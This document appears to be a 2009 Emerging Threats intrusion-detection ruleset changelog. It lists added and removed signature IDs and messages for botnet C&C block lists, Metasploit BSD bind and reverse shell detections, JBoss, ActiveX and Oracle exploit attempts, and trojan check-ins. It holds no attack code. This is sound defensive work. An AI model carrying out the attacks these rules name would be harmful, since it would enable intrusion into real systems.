 2401005 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
 2401006 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
 2401007 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
 2402000 - ET DROP Dshield Block Listed Source (emerging-dshield.rules)
 2403000 - ET DROP Dshield Block Listed Source - BLOCKING (emerging-dshield-BLOCK.rules)
 2404000 - ET DROP Known Bot C&C Server Traffic (group 1)  (emerging-botcc.rules)
 2404001 - ET DROP Known Bot C&C Server Traffic (group 2)  (emerging-botcc.rules)
 2404002 - ET DROP Known Bot C&C Server Traffic (group 3)  (emerging-botcc.rules)
 2404003 - ET DROP Known Bot C&C Server Traffic (group 4)  (emerging-botcc.rules)
 2404004 - ET DROP Known Bot C&C Server Traffic (group 5)  (emerging-botcc.rules)
 2404005 - ET DROP Known Bot C&C Server Traffic (group 6)  (emerging-botcc.rules)
 2404006 - ET DROP Known Bot C&C Server Traffic (group 7)  (emerging-botcc.rules)
 2404007 - ET DROP Known Bot C&C Server Traffic (group 8)  (emerging-botcc.rules)
 2404008 - ET DROP Known Bot C&C Server Traffic (group 9)  (emerging-botcc.rules)
 2404009 - ET DROP Known Bot C&C Server Traffic (group 10)  (emerging-botcc.rules)
 2404010 - ET DROP Known Bot C&C Server Traffic (group 11)  (emerging-botcc.rules)
 2404011 - ET DROP Known Bot C&C Server Traffic (group 12)  (emerging-botcc.rules)
 2404012 - ET DROP Known Bot C&C Server Traffic (group 13)  (emerging-botcc.rules)
 2404013 - ET DROP Known Bot C&C Server Traffic (group 14)  (emerging-botcc.rules)
 2404014 - ET DROP Known Bot C&C Server Traffic (group 15)  (emerging-botcc.rules)
 2404015 - ET DROP Known Bot C&C Server Traffic (group 16)  (emerging-botcc.rules)
 2404016 - ET DROP Known Bot C&C Server Traffic (group 17)  (emerging-botcc.rules)
 2404017 - ET DROP Known Bot C&C Server Traffic (group 18)  (emerging-botcc.rules)
 2404018 - ET DROP Known Bot C&C Server Traffic (group 19)  (emerging-botcc.rules)
 2404019 - ET DROP Known Bot C&C Server Traffic (group 20)  (emerging-botcc.rules)
 2404020 - ET DROP Known Bot C&C Server Traffic (group 21)  (emerging-botcc.rules)
 2404021 - ET DROP Known Bot C&C Server Traffic (group 22)  (emerging-botcc.rules)
 2404022 - ET DROP Known Bot C&C Server Traffic (group 23)  (emerging-botcc.rules)
 2404023 - ET DROP Known Bot C&C Server Traffic (group 24)  (emerging-botcc.rules)
 2404024 - ET DROP Known Bot C&C Server Traffic (group 25)  (emerging-botcc.rules)
 2404025 - ET DROP Known Bot C&C Server Traffic (group 26)  (emerging-botcc.rules)
 2404026 - ET DROP Known Bot C&C Server Traffic (group 27)  (emerging-botcc.rules)
 2404027 - ET DROP Known Bot C&C Server Traffic (group 28)  (emerging-botcc.rules)
 2405000 - ET DROP Known Bot C&C Traffic (group 1) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405001 - ET DROP Known Bot C&C Traffic (group 2) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405002 - ET DROP Known Bot C&C Traffic (group 3) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405003 - ET DROP Known Bot C&C Traffic (group 4) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405004 - ET DROP Known Bot C&C Traffic (group 5) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405005 - ET DROP Known Bot C&C Traffic (group 6) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405006 - ET DROP Known Bot C&C Traffic (group 7) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405007 - ET DROP Known Bot C&C Traffic (group 8) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405008 - ET DROP Known Bot C&C Traffic (group 9) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405009 - ET DROP Known Bot C&C Traffic (group 10) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405010 - ET DROP Known Bot C&C Traffic (group 11) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405011 - ET DROP Known Bot C&C Traffic (group 12) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405012 - ET DROP Known Bot C&C Traffic (group 13) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405013 - ET DROP Known Bot C&C Traffic (group 14) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405014 - ET DROP Known Bot C&C Traffic (group 15) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405015 - ET DROP Known Bot C&C Traffic (group 16) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405016 - ET DROP Known Bot C&C Traffic (group 17) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405017 - ET DROP Known Bot C&C Traffic (group 18) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405018 - ET DROP Known Bot C&C Traffic (group 19) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405019 - ET DROP Known Bot C&C Traffic (group 20) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405020 - ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405021 - ET DROP Known Bot C&C Traffic (group 22) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405022 - ET DROP Known Bot C&C Traffic (group 23) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405023 - ET DROP Known Bot C&C Traffic (group 24) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405024 - ET DROP Known Bot C&C Traffic (group 25) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405025 - ET DROP Known Bot C&C Traffic (group 26) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405026 - ET DROP Known Bot C&C Traffic (group 27) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405027 - ET DROP Known Bot C&C Traffic (group 28) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)


[---]         Removed rules:         [---]

 2008357 - ET SCAN Amap Scannner Traffic Inbound (emerging-scan.rules)
 2404028 - ET DROP Known Bot C&C Server Traffic (group 29)  (emerging-botcc.rules)
 2405028 - ET DROP Known Bot C&C Traffic (group 29) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)


[+++]      Added non-rule lines:     [+++]

     -> Added to emerging-current_events.rules (2):
        #matt jonkman
        #by mike cox

     -> Added to emerging-drop-BLOCK.rules (2):
        #  VERSION 1738
        #  Generated 2009-12-05 00:03:02 EDT

     -> Added to emerging-drop.rules (2):
        #  VERSION 1738
        #  Generated 2009-12-05 00:03:02 EDT

     -> Added to emerging-exploit.rules (37):
        # Metasploit BSD shellcode detect rules by h0f - Jennylab
        # Alberto Garcia de Dios
        # albertogdedios at andaluciajunta.es
        # http://www.jennylab.org
        #####
        # METASPLOIT SHELLCODE RULES
        #####
        # BSD METASPLOIT RULES
        #### BSD BIND SHELL #######
        # BSD Bind Shell - ENCODE: PexFnstenvSub
        # BSD Bind Shell - ENCODE: CountDown
        #BSD Bind Shell - ENCODE: Pex
        #BSD Bind Shell - ENCODE: None
        #BSD Bind Shell - ENCODE: PexAlphaNum
        #BSD Bind Shell - ENCODE: PexFstEnvMov
        #BSD Bind Shell - ENCODE: JmpCallAditive
        #BSD Bind Shell - ENCODE: Alpha2
        #### EOF BSD BIND SHELL ######
        ### BSD REVERSE SHELL #######
        #BSD Reverse Shell - ENCODE: PexFnstenvSub
        #BSD Reverse Shell - ENCODE: Countdown
        #BSD Reverse Shell - ENCODE: Pex
        #BSD Reverse Shell - ENCODE: None
        #BSD Reverse Shell - ENCODE: PexAlphaNum
        #BSD Reverse Shell - ENCODE: PexFnstenvMov
        #BSD Reverse Shell - ENCODE: JmpCallAditive
        #BSD Reverse Shell - ENCODE: Alpha2
        ##### EOF BSD Reverse Shell#####
        ##### BSD SPARC Bind Shell #########
        #BSD SPARC Bind Shell - ENCODE: SPARC
        #BSD SPARC Bind Shell - ENCODE: None
        #### EOF BSD SPARC Bind Shell #########4
        ### BSD SPARC Reverse Shell ########
        #BSD SPARC Reverse Shell - ENCODE: None
        #BSD SPARC Reverse Shell - ENCODE: SPARC
        #### EOF BSD SPARC Reverse Shell ####
        #by Kevin Ross

     -> Added to emerging-malware.rules (1):
        #by Jamie Blasco

     -> Added to emerging-policy.rules (1):
        #by mex

     -> Added to emerging-sid-msg.map (83):
        2010369 || ET WEB_CLIENT Possible Symantec Altiris Deployment Solution and Notification Server ActiveX Control RunCmd Arbitrary Code Execution Attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_CLIENT/WEB_Symantec || url,doc.emergingthreats.net/2010369 || cve,2009-3033 || url,www.securityfocus.com/bid/37092 || url,securitytracker.com/alerts/2009/Nov/1023238.html
        2010370 || ET WEB_CLIENT ACTIVEX Possible Symantec Altiris Deployment Solution and Notification Server ActiveX Control RunCmd Arbitrary Code Execution Function Call Attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_CLIENT/WEB_Symantec || url,doc.emergingthreats.net/2010370 || cve,2009-3033 || url,www.securityfocus.com/bid/37092 || url,securitytracker.com/alerts/2009/Nov/1023238.html
        2010371 || ET SCAN Amap TCP Service Scan Detected || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/SCAN/SCAN_Amap || url,doc.emergingthreats.net/2010371 || url,freeworld.thc.org/thc-amap/
        2010372 || ET SCAN Amap UDP Service Scan Detected || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/SCAN/SCAN_Amap || url,doc.emergingthreats.net/2010372 || url,freeworld.thc.org/thc-amap/
        2010373 || ET WEB_CLIENT Haihaisoft Universal Player ActiveX Control URL Property Buffer Overflow Attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_CLIENT/WEB_HaiHaisoft || url,doc.emergingthreats.net/2010373 || url,www.securityfocus.com/bid/37151/info || url,www.shinnai.net/exploits/ZzLsi6TIfSuVPh1kPHmP.txt
        2010374 || ET WEB_CLIENT ACTIVEX Haihaisoft Universal Player ActiveX Control URL Property Buffer Overflow Function Call Attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_CLIENT/WEB_HaiHaisoft || url,doc.emergingthreats.net/2010374 || url,www.securityfocus.com/bid/37151/info || url,www.shinnai.net/exploits/ZzLsi6TIfSuVPh1kPHmP.txt
        2010375 || ET EXPLOIT Possible Oracle Database Text Component ctxsys.drvxtabc.create_tables Remote SQL Injection Attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Oracle || url,doc.emergingthreats.net/2010375 || cve,2009-1991 || url,www.securityfocus.com/bid/36748
        2010376 || ET CURRENT_EVENTS WU Malicious Spam Inbound || url,doc.emergingthreats.net/2010376 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_DHL
        2010377 || ET POLICY JBOSS/JMX 80 access from outside || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Jboss || url,doc.emergingthreats.net/2010377 || url,www.nruns.com/_downloads/Whitepaper-Hacking-jBoss-using-a-Browser.pdf || url,www.notsosecure.com/folder2/2009/10/27/hacking-jboss-with-jmx-console/
        2010378 || ET POLICY JBOSS/JMX 8080 access from outside || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Jboss || url,doc.emergingthreats.net/2010378 || url,www.nruns.com/_downloads/Whitepaper-Hacking-jBoss-using-a-Browser.pdf || url,www.notsosecure.com/folder2/2009/10/27/hacking-jboss-with-jmx-console/
        2010379 || ET WEB-APPS JBOSS/JMX REMOTE WAR deployment attempt (POST) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SERVER/WEB_Jboss || url,doc.emergingthreats.net/2010379 || url,www.nruns.com/_downloads/Whitepaper-Hacking-jBoss-using-a-Browser.pdf || url,www.notsosecure.com/folder2/2009/10/27/hacking-jboss-with-jmx-console/
        2010380 || ET WEB-APPS JBOSS/JMX REMOTE WAR deployment attempt (GET) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SERVER/WEB_Jboss || url,doc.emergingthreats.net/2010380 || url,www.nruns.com/_downloads/Whitepaper-Hacking-jBoss-using-a-Browser.pdf || url,www.notsosecure.com/folder2/2009/10/27/hacking-jboss-with-jmx-console/
        2010381 || ET TROJAN Bredolab Checkin || url,doc.emergingthreats.net/2010381 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Bredolab || url,threatexpert.com/report.aspx?md5=a5f94577d00d0306e4ef64bad30e5d37
        2010382 || ET TROJAN Fake AV GET || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Bredolab || url,doc.emergingthreats.net/2010382 || url,threatexpert.com/report.aspx?md5=8d1b47452307259f1e191e16ed23cd35
        2010383 || ET EXPLOIT METASPLOIT BSD Bind shell || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010383
        2010384 || ET EXPLOIT METASPLOIT BSD Bind shell (Countdown Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010384
        2010385 || ET EXPLOIT METASPLOIT BSD Bind shell (Countdown Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010385
        2010386 || ET EXPLOIT METASPLOIT BSD Bind shell (Countdown Encoded 3) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010386
        2010387 || ET EXPLOIT METASPLOIT BSD Bind shell (Countdown Encoded 4) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010387
        2010388 || ET EXPLOIT METASPLOIT BSD Bind shell (Countdown Encoded 5) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010388
        2010389 || ET EXPLOIT METASPLOIT BSD Bind shell (Pex Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010389
        2010390 || ET EXPLOIT METASPLOIT BSD Bind shell (Pex Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010390
        2010391 || ET EXPLOIT METASPLOIT BSD Bind shell (Not Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010391
        2010392 || ET EXPLOIT METASPLOIT BSD Bind shell (Not Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010392
        2010393 || ET EXPLOIT METASPLOIT BSD Bind shell (Not Encoded 3) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010393
        2010394 || ET EXPLOIT METASPLOIT BSD Bind shell (Not Encoded 4) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010394
        2010395 || ET EXPLOIT METASPLOIT BSD Bind shell (Not Encoded 5) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010395
        2010396 || ET EXPLOIT METASPLOIT BSD Bind shell (Pex Alphanumeric Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010396
        2010397 || ET EXPLOIT METASPLOIT BSD Bind shell (Pex Alphanumeric Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010397
        2010398 || ET EXPLOIT METASPLOIT BSD Bind shell (Pex Alphanumeric Encoded 3) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010398
        2010399 || ET EXPLOIT METASPLOIT BSD Bind shell (Pex Alphanumeric Encoded 4) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010399
        2010400 || ET EXPLOIT METASPLOIT BSD Bind shell (Pex Alphanumeric Encoded 5) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010400
        2010401 || ET EXPLOIT METASPLOIT BSD Bind shell (PexFstEnvMov Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010401
        2010402 || ET EXPLOIT METASPLOIT BSD Bind shell (PexFstEnvMov Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010402
        2010403 || ET EXPLOIT METASPLOIT BSD Bind shell (JmpCallAdditive Encoded) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010403
        2010404 || ET EXPLOIT METASPLOIT BSD Bind shell (Alpha2 Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010404
        2010405 || ET EXPLOIT METASPLOIT BSD Bind shell (Alpha2 Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010405
        2010406 || ET EXPLOIT METASPLOIT BSD Bind shell (Alpha2 Encoded 3) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010406
        2010407 || ET EXPLOIT METASPLOIT BSD Reverse shell (PexFnstenvSub Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010407
        2010408 || ET EXPLOIT METASPLOIT BSD Reverse shell (PexFnstenvSub Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010408
        2010409 || ET EXPLOIT METASPLOIT BSD Reverse shell (Countdown Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010409
        2010410 || ET EXPLOIT METASPLOIT BSD Reverse shell (Countdown Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010410
        2010411 || ET EXPLOIT METASPLOIT BSD Reverse shell (Countdown Encoded 3) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010411
        2010412 || ET EXPLOIT METASPLOIT BSD Reverse shell (Countdown Encoded 4) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010412
        2010413 || ET EXPLOIT METASPLOIT BSD Reverse shell (Pex Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010413
        2010414 || ET EXPLOIT METASPLOIT BSD Reverse shell (Pex Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010414
        2010415 || ET EXPLOIT METASPLOIT BSD Reverse shell (Not Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010415
        2010416 || ET EXPLOIT METASPLOIT BSD Reverse shell (Not Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010416
        2010417 || ET EXPLOIT METASPLOIT BSD Reverse shell (Not Encoded 3) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010417
        2010418 || ET EXPLOIT METASPLOIT BSD Reverse shell (Pex Alphanumeric Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010418
        2010419 || ET EXPLOIT METASPLOIT BSD Reverse shell (Pex Alphanumeric Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010419
        2010420 || ET EXPLOIT METASPLOIT BSD Reverse shell (Pex Alphanumeric Encoded 3) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010420
        2010421 || ET EXPLOIT METASPLOIT BSD Reverse shell (PexFnstenvMov Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010421
        2010422 || ET EXPLOIT METASPLOIT BSD Reverse shell (PexFnstenvMov Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010422
        2010423 || ET EXPLOIT METASPLOIT BSD Reverse shell (JmpCallAdditive Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010423
        2010424 || ET EXPLOIT METASPLOIT BSD Reverse shell (Alpha2 Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010424
        2010425 || ET EXPLOIT METASPLOIT BSD Reverse shell (Alpha2 Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010425
        2010426 || ET EXPLOIT METASPLOIT BSD Reverse shell (Alpha2 Encoded 3) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010426
        2010427 || ET EXPLOIT METASPLOIT BSD SPARC Bind shell (SPARC Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010427
        2010428 || ET EXPLOIT METASPLOIT BSD SPARC Bind shell (SPARC Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010428
        2010429 || ET EXPLOIT METASPLOIT BSD SPARC Bind shell (Not Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010429
        2010430 || ET EXPLOIT METASPLOIT BSD SPARC Bind shell (Not Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010430
        2010431 || ET EXPLOIT METASPLOIT BSD SPARC Bind shell (Not Encoded 3) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010431
        2010432 || ET EXPLOIT METASPLOIT BSD SPARC Bind shell (Not Encoded 4) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010432
        2010433 || ET EXPLOIT METASPLOIT BSD SPARC Reverse shell (Not Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010433
        2010434 || ET EXPLOIT METASPLOIT BSD SPARC Reverse shell (Not Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010434
        2010435 || ET EXPLOIT METASPLOIT BSD SPARC Reverse shell (SPARC Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010435
        2010436 || ET EXPLOIT METASPLOIT BSD SPARC Reverse shell (SPARC Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010436
        2010437 || ET EXPLOIT METASPLOIT BSD SPARC Reverse shell (Not Encoded 3) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010437
        2010438 || ET MALWARE Possible Malicious Applet Access (justexploit kit) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/MALWARE/MALWARE_Justexploit || url,doc.emergingthreats.net/2010438 || url,www.malwaredomainlist.com/forums/index.php?topic=3570.0
        2010439 || ET TROJAN Generic Trojan Checkin (UA VBTagEdit) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Generic.Malware || url,doc.emergingthreats.net/2010439
        2010440 || ET CURRENT_EVENTS MALWARE Potential Malware Download, flash-HQ-plugin.40000.exe || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads || url,doc.emergingthreats.net/2010440 || url,malwareurl.com
        2010441 || ET TROJAN Possible Storm Variant HTTP Post (S) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Storm || url,doc.emergingthreats.net/2010441 || url,www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf || url,cyber.secdev.ca/2009/11/russian-malware-bundle
        2010442 || ET TROJAN Possible Storm Variant HTTP Post (U) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Storm || url,doc.emergingthreats.net/2010442 || url,www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf || url,cyber.secdev.ca/2009/11/russian-malware-bundle
        2010443 || ET CURRENT_EVENTS MALWARE Potential Malware Download, rogue antivirus downloader (installer.1.exe) || url,doc.emergingthreats.net/2010443 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads || url,malwareurl.com
        2010444 || ET CURRENT_EVENTS MALWARE Potential Malware Download, pdf exploit || url,doc.emergingthreats.net/2010444 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads || url,malwareurl.com
        2010445 || ET CURRENT_EVENTS MALWARE Potential Malware Download, java exploit || url,doc.emergingthreats.net/2010445 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads || url,malwareurl.com
        2010446 || ET CURRENT_EVENTS MALWARE Potential Malware Download, loadjavad.php exploit || url,doc.emergingthreats.net/2010446 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads || url,malwareurl.com
        2010447 || ET CURRENT_EVENTS MALWARE Potential Malware Download, rogue antivirus (IAInstall.exe) || url,doc.emergingthreats.net/2010447 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads || url,malwareurl.com
